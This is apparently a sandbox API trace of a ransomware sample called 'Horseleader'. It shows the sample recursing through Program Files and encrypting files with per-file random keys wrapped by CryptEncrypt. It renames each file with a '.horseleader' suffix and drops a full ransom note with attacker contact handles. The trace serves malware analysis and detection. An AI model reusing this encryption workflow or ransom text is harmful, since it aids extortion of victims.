GetProcessHeap () returned 0x780000 [0252.276] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b628 | out: hHeap=0x780000) returned 1 [0252.276] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="10", cAlternateFileName="")) returned 0 [0252.277] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0252.277] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\#Decrypt#.txt") returned 71 [0252.277] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\#Decrypt#.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0252.277] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0252.277] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0252.278] lstrlenA (lpString="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") returned 1368 [0252.278] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0252.279] CloseHandle (hObject=0x1cc) returned 1 [0252.279] GetProcessHeap () returned 0x780000 [0252.279] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0252.279] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="AS OLEDB", cAlternateFileName="ASOLED~1")) returned 0 [0252.279] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0252.279] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\#Decrypt#.txt") returned 62 [0252.279] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\#Decrypt#.txt" (normalized: "c:\\program files\\microsoft analysis services\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0252.282] lstrlenA (lpString="All your files 
have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0252.282] WriteFile (in: hFile=0x164, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0252.283] lstrlenA (lpString="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") returned 1368 [0252.283] WriteFile (in: hFile=0x164, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0252.283] CloseHandle (hObject=0x164) returned 1 [0252.283] GetProcessHeap () returned 0x780000 [0252.283] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0252.283] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x512f1610, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0252.283] lstrcmpiW (lpString1="Microsoft Office", lpString2="Windows") returned -1 [0252.284] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office") returned 37 [0252.284] lstrcmpW (lpString1="Microsoft Office", lpString2=".") returned 1 [0252.284] lstrcmpW (lpString1="Microsoft Office", lpString2="..") returned 1 [0252.284] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Microsoft Office", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0252.284] GetProcessHeap () returned 0x780000 [0252.284] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7c8598 [0252.284] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\*") returned 39 [0252.284] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x512f1610, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0252.284] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0252.284] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\.") returned 39 [0252.284] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0252.284] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x512f1610, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0252.284] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0252.284] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\..") returned 40 [0252.285] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0252.285] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0252.285] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: 
lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="CLIPART", cAlternateFileName="")) returned 1 [0252.285] lstrcmpiW (lpString1="CLIPART", lpString2="Windows") returned -1 [0252.285] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART") returned 45 [0252.285] lstrcmpW (lpString1="CLIPART", lpString2=".") returned 1 [0252.285] lstrcmpW (lpString1="CLIPART", lpString2="..") returned 1 [0252.285] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0252.285] GetProcessHeap () returned 0x780000 [0252.285] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0252.285] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\*") returned 47 [0252.285] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0252.286] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0252.286] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\.") returned 47 [0252.287] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0252.287] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0252.287] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0252.287] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\..") returned 48 [0252.287] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0252.287] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0252.287] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7090d6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7090d6b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PUB60COR", cAlternateFileName="")) returned 1 [0252.287] lstrcmpiW (lpString1="PUB60COR", lpString2="Windows") returned -1 [0252.287] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 54 [0252.287] lstrcmpW (lpString1="PUB60COR", lpString2=".") returned 1 [0252.287] lstrcmpW (lpString1="PUB60COR", lpString2="..") returned 1 [0252.287] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0252.287] GetProcessHeap () returned 0x780000 [0252.287] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79b628 [0252.287] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\*") returned 56 [0252.287] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7090d6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7090d6b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0252.290] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0252.290] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\.") returned 56 [0252.291] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0252.291] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7090d6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7090d6b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0252.292] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0252.292] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\..") returned 57 [0252.292] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0252.292] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0252.292] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54952c00, ftCreationTime.dwHighDateTime=0x1bd4b49, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54952c00, ftLastWriteTime.dwHighDateTime=0x1bd4b49, nFileSizeHigh=0x0, nFileSizeLow=0x2340, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00004_.GIF", cAlternateFileName="")) returned 1 [0252.292] lstrcmpiW (lpString1="AG00004_.GIF", lpString2="Windows") returned -1 [0252.292] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 67 [0252.292] StrStrIW (lpFirst="AG00004_.GIF", lpSrch=".horseleader") returned 0x0 [0252.292] lstrcmpW (lpString1="AG00004_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.292] lstrcmpW (lpString1="AG00004_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.292] lstrlenW (lpString=".testttjffg") returned 11 [0252.292] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.292] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.292] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.293] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.293] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 67 [0252.293] StrStrW (lpFirst="AG00004_.GIF", lpSrch=".txt") returned 0x0 [0252.294] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=9024) returned 1 [0252.294] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2340, lpOverlapped=0x0) returned 1 [0252.299] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdcc0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.299] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2340, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2340, lpOverlapped=0x0) returned 1 [0252.299] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.299] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.299] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.299] CloseHandle (hObject=0x158) returned 1 [0252.300] GetProcessHeap () returned 0x780000 [0252.300] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.300] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\AG00004_.GIF.horseleader") returned 79 [0252.300] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif.horseleader")) returned 1 [0252.301] GetProcessHeap () returned 0x780000 [0252.301] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.301] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83130700, ftCreationTime.dwHighDateTime=0x1bd4b49, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x83130700, ftLastWriteTime.dwHighDateTime=0x1bd4b49, nFileSizeHigh=0x0, nFileSizeLow=0x1c30, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00011_.GIF", cAlternateFileName="")) returned 1 [0252.301] lstrcmpiW (lpString1="AG00011_.GIF", lpString2="Windows") returned -1 [0252.301] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 67 [0252.301] StrStrIW (lpFirst="AG00011_.GIF", lpSrch=".horseleader") returned 0x0 [0252.301] lstrcmpW (lpString1="AG00011_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.301] lstrcmpW (lpString1="AG00011_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.301] lstrlenW (lpString=".testttjffg") returned 11 [0252.301] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.301] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 
[0252.301] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.301] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.302] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 67 [0252.302] StrStrW (lpFirst="AG00011_.GIF", lpSrch=".txt") returned 0x0 [0252.302] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7216) returned 1 [0252.302] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1c30, lpOverlapped=0x0) returned 1 [0252.304] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe3d0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.304] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1c30, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1c30, lpOverlapped=0x0) returned 1 [0252.305] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.305] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.305] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.305] CloseHandle (hObject=0x158) returned 1 [0252.305] GetProcessHeap () returned 0x780000 [0252.305] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.305] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF.horseleader") returned 79 [0252.305] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif.horseleader")) returned 1 [0252.306] GetProcessHeap () returned 0x780000 [0252.306] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.306] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78587200, ftCreationTime.dwHighDateTime=0x1bd4b49, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78587200, ftLastWriteTime.dwHighDateTime=0x1bd4b49, nFileSizeHigh=0x0, nFileSizeLow=0x3a19, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00021_.GIF", cAlternateFileName="")) returned 1 [0252.306] lstrcmpiW (lpString1="AG00021_.GIF", lpString2="Windows") returned -1 [0252.306] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 67 [0252.306] StrStrIW (lpFirst="AG00021_.GIF", lpSrch=".horseleader") returned 0x0 [0252.306] lstrcmpW 
